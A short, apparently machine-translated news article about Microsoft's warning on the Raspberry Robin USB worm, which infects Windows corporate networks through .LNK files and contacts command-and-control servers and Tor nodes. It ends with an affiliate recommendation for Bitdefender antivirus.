Security Malware and Virus Antivirus Microsoft researchers warn about the high-risk worm Raspberry Robin, which is infecting hundreds of windows corporate networks. Pixabay
Cybersecurity researchers are constantly working to try to prevent old and new threats from jeopardizing users' devices and the security of their data. In this regard, Microsoft has recently warned of the existence of a worm considered high risk that is infecting hundreds of Windows corporate networks. Raspberry Robin: it is infecting hundreds of Windows corporate networks The malware in question is dubbed raspberry Robin, spreads via USB devices, and was first spotted in September 2021 by Researchers at Red Canary. Cybersecurity firm Sekoia said it had also found it on various QNAP NAS as command and control servers in early November 2021. However, the first malicious artifacts linked to the worm date back to 2019. The diffusion takes place by clicking on the . LNK present on infected pendrives. By clicking on it, the worm creates an msiexec process.exe via the Command Prompt and starts another malicious file. It then communicates with the command and control servers with a short URL. If the connection is successful, you will proceed with downloading and installing a lot of other malicious DLLs, which attempt to communicate with the Tor nodes. It is good to keep in mind that while infected computers communicated with the Tor network, the attackers behind Raspberry Robin have not yet taken steps to exploit the exploit to gain access to sensitive information, despite the fact that they can easily bypass the UAC (User Account Control) by exploiting Windows utilities. To avoid running into cyber threats, it is essential to equip your devices with an efficient and reliable antivirus, as are bitdefender's products. This article contains affiliate links: purchases or orders placed through such links will allow our site to receive a commission.